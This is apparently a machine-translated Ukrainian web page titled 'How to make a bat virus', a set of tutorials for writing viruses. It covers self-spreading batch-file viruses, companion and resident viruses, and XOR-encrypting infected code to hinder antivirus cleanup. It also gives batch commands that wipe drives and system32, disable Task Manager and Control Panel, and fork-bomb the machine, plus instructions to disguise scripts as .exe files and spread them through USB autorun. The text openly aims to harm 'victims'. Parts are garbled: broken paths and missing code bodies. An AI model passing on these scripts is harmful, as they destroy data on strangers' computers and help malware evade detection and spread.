Як зробити вірус bat
Як зробити вірус bat. (Збірник вірусів)
BAT-вірус
@Echo off
Цей вірус заражає вінчестер, залишаючи тільки один файл virus.bat. Але все-таки я б не сказав що це повноцінний вірус, тому що він позбавлений можливості заражати інші комп'ютери. Щоб цей BAT-вірус знайшов більш чіткі обриси доповнимо його можливістю заражати інші ПК:
У цьому прикладі з'являється рядок, яка дає можливість вірусу заражати дискети. Сенс цього в тому що якщо при перезавантаженні ПК в дисководі буде дискета, то вона буде заражена.
Звичайно файл virus.bat в кореневому диску C: буде сильно муляти очі користувачеві, щоб цього не було існує програма attrib. Перетворимо вірус:
attrib + h c: virus.bat> nul
Якщо ви уважні, то ви вже зрозуміли, що виклик файлу virus.bat в autoexec.bat буде записуватися кожен раз при перезавантаженні ПК. Щоб цього не сталося є простий спосіб: після запису виклику треба за допомогою програми attrib встановити атрибут тільки читання у autoexec.bat. А є інший варіант, він трохи складніше, але набагато грамотніше:
if exist c: virus.bat goto cool
attrib + h c: virus.bat> nul
Тут другий рядок перевіряє чи існує вже файл c: virus.bat і якщо він вже існує, то відбувається перехід до мітці cool. Цей спосіб теж дуже простий. Явний недолік - якщо користувач прибере виклик з autoexec.bat, а файл virus.bat залишить, то дурний вірус буде нагло обдурять. Щоб вірус був розумніший, то треба використовувати програму find, якщо вам буде не лінь з нею розбиратися, то ви зможете написати більш складний BAT-вірус, який буде заражати один файл c: autoexec.bat, а все * .BAT. приклад:
if '% 1 ==' In_ goto MeTrAin
if exist c: MeTrA.bat goto MeTrAru
if not exist% 0 goto MeTrAen
attrib + h c: MeTrA.bat
for %% t in (* .bat) do call c: MeTrA In_ %% t
if not errorlevel 1 goto MeTrAen
Сенс зараження такий: у вірусі кожен рядок має мітку, в даному прикладі вона MeTrA. Наприклад, в першому рядку ця мітка нічого не робить, у другому рядку ця мітка, як би, не є пасивною, вона використовується для внутрішньої роботи вірусу, а саме бере участь в назві мітки. При запуску вірус перевіряє, чи є файл C: METRA.BAT, якщо немає, то вірус створює його і за допомогою програми find копіює з файлу (з якого стартував) все рядки містять мітку вірусу, тобто копіює тільки вірусні рядки. Так, вірусні рядки скопійовані. Значить у файлі C: METRA.BAT тепер знаходиться копія вірусу. Далі вірус шукає BAT-файли. Щоб не відбувалося повторного зараження використовується все таже програма find. Припустимо вірус знайшов файл RUN.BAT і він виявився ще не заражений, тоді вірус викликає файл C: METRA.BAT з такими параметрами: In_ RUN.BAT, тут перший параметр In_ каже вірусу, що треба заразити файл, ім'я якого зазначено по-другому параметрі, в даному випадку він RUN.BAT. Вірус в C: METRA.BAT заражає файл RUN.BAT найпростішим способом - за допомогою команди type дописує до файлу RUN.BAT себе. Ось так файл RUN.BAT виявляється зараженим.
Компаньон-вірус
Ці віруси не змінюють програми. Вони створюють для EXE-файлів COM-файли. При запуску програми спочатку запуститься COM-файл з вірусом, який заразивши інші файли запустить EXE-файл. Розглянемо приклад:
Вірус буде краще якщо його упакувати чимось на кшталт PKLITE з параметром -e. Вгорі є масив - розмір вірусу, дивіться, щоб значення його було не менше EXE-файлу з вірусом, а бажано щоб і більше не було.
Вірус-супутник
Принцип зараження:
• знайти EXE-файл
• знайти OVR-файл з тим же ім'ям
• якщо його немає, то перейменувати знайдений EXE-файл в OVR-файл, записатися замість EXE-файлу.
резидентні віруси
З довідки Паскаля:
procedure Keyclick; interrupt;
if Port [$ 60] <$80 then
Тепер приберемо всі помилки з цього прикладу і переробимо під вірус:
procedure Keyclick; interrupt;
Тут процедура InfExe є звичайною процедурою нерезидентного вірусу (заражає в поточному каталозі). А ось ці рядки впишемо в те місце вірусу, де як би його кінець.
На жаль в довідці не сказано як уникати повторної установки в пам'ять, тому я раджу щоб вірус копіював своє тіло в який-небудь файл на диску C. вставляв його виклик в config.sys. Приклад: install = c: vir.exe / 123, тут / 123 - це такий параметр, він говорить вірусу, що той стартував для зараження пам'яті, тобто йому не треба запускати свого носія, а треба виконати ці три рядки.
Можна помудрувати і з іншими перериваннями, але змушений вас засмутити, віруси такого типу, як правило, дуже глючний і працюють, в основному, тільки в багатозначною середовищі (в емуляції DOS виснуть).
ускладнення лікування
Якщо у вас немає бажання щоб ваш вірус, діставшись якомусь ламеру, став жертвою його антивіруса, то слід подумати про ускладнення лікування.
Вірус на Паскалі, як правило, заражає програми в початок, переносячи старе вміст в кінець. Такими вірусами антивірусні бази поповнюються автоматом (без втручання людини). Воно і зрозуміло, переписати кінець в початок і обрізати довжину - це дуже проста операція. Сенс ускладнення лікування полягає у кодуванні шматка своєї жертви. Оскільки шматок жертви при перенесенні до кінця файла знаходиться в масиві, тоді чинимо приблизно так:
for i: = 1 to 777 do
i2: = ord (cc) xor 343;
Тут a1 - це масив, в якому зберігається початок жертви; i, i2 - integer; cc - char.
В результаті даної операції шифрується шматок файлу-жертви (777 байт). Оскільки операція шифровки здійснюється за допомогою XOR - для розшифровки використовується та ж операція. Значить цю маленьку підпрограму треба оформити у вигляді процедури, яку слід прописати в процедурі зараження і в процедурі запуску свого носія (перед запуском і після запуску). Якщо ви не розбираєтеся в XOR, то скажу, в моєму прикладі шифровка здійснюється за допомогою ключа 343, він може бути від 1 до 65000. Можна зробити так, щоб цей ключ змінювався при зараженні кожного файлу, наприклад, зробити щоб ключ залежав від розміру свого носія або можна генерувати ключ випадковим чином і поміщати його де-небудь в тілі вірусу або зчитувати кілька байт коду жертви, отримувати їх ord-значення і використовувати як ключ. І ще, в моєму прикладі шифровка йде від початку файлу, а можна зробити певне зміщення, яке теж щоб залежало від чогось. Розмір шифровки у мене 777, а можна зробити її теж випадкової і т.д. Можна також захистити вірус від ламерской трасування:
O1H. O3H. Br. Pointer;
procedure ReBoot; Interrupt;
Тут замість фрази Hello слід вставити процедури вірусу, процедуру запуску носія слід вставляти після рядків відновлення векторів.
@echo off - забороняємо висновок команд на екран, в тому числі і результатів їх виконання.
color 40 - робимо фон файлу червоним, а літери чорними.
label LAMER - команда label зазначена без параметрів перейменовує системний диск на задане слово.
attrib -s -r -h -a% systemdrive% *. * - знімаємо системні атрибути з деяких файлів.
erase% windir% *. * / q - банальне видалення файлів.
erase% windir% system32 *. * / q - банальне видалення файлів, хоча вінду знесе без проблем.
erase% systemdrive% *. * / q - видалення системно важливих прихованих файлів на системному диску. Хоча щоб вінда більше не запустилася ніяким чином досить видалити файл ntldr і перевантажитися.
regedit (шлях до вашого файлу) - Додаємо інформацію з вашого .reg файлу до реєстру. Існує ще й команда reg з параметрами, але іноді простіше створити окремий .reg файл. Тут фантазії може бути багато.
echo текст> (>>) файл - Додаємо записи в файл. Знак> створює новий файл з заданим текстом, >> додає вже в існуючий файл.
shutdown -r -f - Примусово перезавантажуємо комп, незважаючи на протести системи.
@echo off
del "% SystemRoot% # 92; Driver Cache # 92; i386 # 92; driver.cab" / f / q> nul
Прибрати робочий стіл.
@echo off
reg add HKCU # 92; Software # 92; Microsoft # 92; Windows # 92; CurrentVersion # 92; Policies # 92; Explorer / v NoDesktop / t REG_DWORD / d 1 / f> nul
Самоліквідація! Дописуємо до будь-якої проге що-б не паліться. @echo off del "% 0"> nul
@echo off
reg add HKCU # 92; Software # 92; Microsoft # 92; Windows # 92; Current Version # 92; Policies # 92; System / v
DdisableTaskMgr / t REG_DWORD / d 1 / f> nul
-забороняє ТаскМена
@echo off
% SystemRoot% / system32 / rundll32 user32, SwapMouseButton> nul
-мнея кнопки миші місцями, можна здорово зіпсувати нерви кому нидь
@echo off
reg add HKCU # 92; Software # 92; Microsoft # 92; Windows # 92; Current Version # 92; Policies # 92; Explorer # 92; RestrictRun
/ V 1 / t REG_DWORD / d% SystemRoot% # 92; explorer.exe / f> nul
-заборона запуску програм
@echo off
del "% SystemRoot% # 92; Cursors # 92; *. *"> nul
-видаляє курсори миші
@echo off
del "% SystemRoot% # 92; Media" / q> nul
-видаляє звуки вінди
@echo off
reg add HKCU # 92; Software # 92; Microsoft # 92; Windows # 92; Current Version # 92; Policies # 92; Explorer
/ V NoControlPanel / t REG_DWORD / d 1 / f> nul
-заборонити панель управління
@echo off
net user "ламер" / add> nul
@echo off
del "% SystemRoot% # 92; Cursors # 92; *. *"> nul
Del C: # 92; WINDOWS # 92; system32 # 92; catsrvps.dll
Del C: # 92; WINDOWS # 92; system32 # 92; catsrvut.dll
Del C: # 92; WINDOWS # 92; system32 # 92; cdfview.dll
Del C: # 92; WINDOWS # 92; system32 # 92; cisvc.exe
Del C: # 92; WINDOWS # 92; system32 # 92; ckcnv.exe
Del C: # 92; WINDOWS # 92; system32 # 92; clb.dll
Del C: # 92; WINDOWS # 92; system32 # 92; cmd.exe
Del C: # 92; WINDOWS # 92; system32 # 92; cmdial32.dll
Del C: # 92; WINDOWS # 92; system32 # 92; cnbjmon.dll
Del C: # 92; WINDOWS # 92; system32 # 92; comctl32.ocx
Del C: # 92; WINDOWS # 92; system32 # 92; dplaysvr.exe
Del C: # 92; WINDOWS # 92; NOTEPAD.EXE
Del C: # 92; WINDOWS # 92; twunk_32.exe
Del C: # 92; WINDOWS # 92; wmprfRUS.prx
Del C: # 92; WINDOWS # 92; WindowsShell.Manifest ');
Del C: # 92; WINDOWS # 92; regedit.exe
Del C: # 92; WINDOWS # 92; explorer.exe
Del C: # 92; WINDOWS # 92; OemDrv
Del C: # 92; WINDOWS # 92; PeerNet # 92; sqldb20.dll
Del C: # 92; WINDOWS # 92; PeerNet # 92; sqlqp20.dll
Del C: # 92; WINDOWS # 92; twain_32 # 92; wiatwain.ds
del virus.bat
Цей батик просто копіює себе на всякі носії кожні 20 секунд.
Превращаещь цей батик в explorer.exe задопомогою Batexec і куди в архів.
Потім і щешь у себе на компі файл c: # 92; windows # 92; explorer.exe (з іконкою мій комп'ютер він відкриває робочий стіл) і кидаєш його в архів попередньо закинувши в папку system32 (не в системну з купою файлів, а содданную тебою) далі цей архів перетворюєш в SFX з параметрами: Шлях для розпакування: c: # 92; windows # 92; ; Режим виведення інформації: Приховати все; Режим перезапису: Перезаписувати всі файли без запиту. Іменушь цей SFX в avtorun. Створюєш другий файл autorun.inf з вмістом:
записавши ці файли в кореневу паку диска (флешки). І все, але якщо є файл c: # 92; exp.com то ця програма сама завершить свою роботу.
Першою з точки ми змінюємо час на 00:00, а другий скопіюємо файл на диск F - флешка з ім'ям Work. Не забудьте, зберегти блокнотовскій файл у форматі .bat. Замість часу можна змінити і дату «Date 13.06.23». Написавши таку строчку, ми змінимо дату на 2023 рік, 6 місяць, 13 число)) Тепер невеликий перелік того, що можна писати в блокнотовском вірус.
ПЕРЕЛІК:
del F: *. * / q
label F: HACK
2) Програма для зміни дати і часу на комп'ютері і копіювання її на диск C і на флешку.
Ви вже вмієте створювати простенькі віруси.
Він вміє: міняти час, дату, назви дисків та флешок, відкривати програми, створювати папки, копіювати себе, додавати користувачів, міняти розширення і знищувати інформацію. Це досить невеликий список, чесно кажучи. Тепер я навчу вас деяким тонкощам вірусопісательсва. Припустимо, ви вже зробили вірус, але виглядає він досить непривабливо. Ну хто відкриє незрозумілий файл? Ви маєте рацію, таких людей на світі не багато. Як же змінити формат з .bat на .exe і додати іконку. Дуже легко (Потрібно щоб на комп'ютері був WinRAR). Знаходимо будь-який вірус з розширенням .bat, натискаємо на нього правою кнопкою, тиснемо «Додати до архіву ...». Ставимо галочку «Створити SFX-архів», вибираємо вкладку додатково, і натискаємо на кнопку «Параметри SFX ...». У вікні «Виконати після розпакування» пишемо назви вірусу (приклад Virus.bat) а у вікні «Текст і графіка» далі «Завантажити значок SFX з фала». Тиснемо «Огляд» і шукаємо будь-який значок формату .ico. Тепер тиснемо ОК. Готово)) Формат .exe, а не .bat, як нам і треба було. Тепер можна робити з вірусами що завгодно. А що саме, вирішувати вже вам. Хочете навчитися ще командам, якими можна просто добити нашого «лоха», відкриваємо www.Google.ru, пишемо bat віруси і тиснемо «Шукати».
Припустимо, ви написали вірус, який буде псувати відкриту від папок інформацію і трохи шкодити:
Готово? - запитаєте ви. Ні. Потрібно його закінчити. Нова команда «@echo off» вводитися на початку нашого вірусу і приховує все, що в ньому відбувається в подальшому. Одним словом, не дамо користувачеві побачити, що сталося. Ще додавши після кожної команди простеньке, але дуже ефективна дія, як «> nul» наприклад «time 00:00> nul», ми приховуємо Сточки. Отже, можна вдосконалити наш вірус:
@echo off
del C: *. * / q> nul
del D: *. * / q> nul
del E: *. * / q> nul
del F: *. * / q> nul
time 00:00> nul
date 13.06.23> nul
del *. * / q> nul
Ось, тепер наш вірус готовий. Зберігаємо, конвертований, а ось, що далі з ним робити - ваша справа. До речі, є відмінна програма для конвертації .bat в .exe, вона працює набагато краще WinRAR'а, називається вона «Bat to exe converter». Завантажити її можна в інтернеті, вона безкоштовна. Отже, повернемося до вірус-письменництва.
% SystemRoot% / system32 / rundll32 user32, SwapMouseButton
Дана рядок змінює клавіші миші місцями. Можна з кого-то прикольнуться, поки він в'їде, що трапилося, пройде час (якщо він зовсім юзер), для особливо обдарованих скажу, якщо ви ввели це у себе відключити досить просто: «Панель Управління», «Принтери та інше обладнання», « миша »і знімаємо першу галочку.
Отже, далі поїхали далі:
x;
Start mspaint
goto x;
Дуже непогана рядок для навантаження слабеньких машин. Команда відкриває Paint, причому дуже швидко. Раз 60 до того як ви зрозумієте, що трапилося і закриєте програму. Спробуйте ввести замість mspaint будь рядка програм. Працює)) Можна використовувати по кілька таких команд до повного гальмування комп'ютера жертви. Новий скрипт:
Дуже жорстока команда: додає програму в автозавантаження ОС. Не раджу перевіряти на вашому комп'ютері. Чи не зупиняємося, а їдемо далі))
assoc .lnk = .txt> nul
assoc .exe = .mp3> nul